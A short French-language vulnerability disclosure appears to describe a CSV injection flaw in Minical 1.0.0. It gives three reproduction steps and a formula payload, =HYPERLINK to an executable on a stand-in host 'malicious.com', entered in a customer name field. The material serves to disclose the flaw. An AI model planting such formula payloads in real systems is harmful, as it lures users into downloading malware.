
Preuve de concept démontrant la vulnérabilité d'injection CSV dans Minical 1.0.0, avec des étapes de reproduction détaillées et un exemple de charge utile.
Minical 1.0.0 est vulnérable à une injection CSV.
Fournisseur : https://github.com/minical/minical
Application de démo : https://demo.minical.io/
Étape 1 : Naviguez vers le module Comptabilité et cliquez sur Créer un nouveau client.

Étape 2 : Saisissez la charge utile dans le champ Nom et cliquez sur Créer.
Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")


Étape 3 : Cliquez sur Télécharger le rapport CSV et observez que la charge utile est rendue.
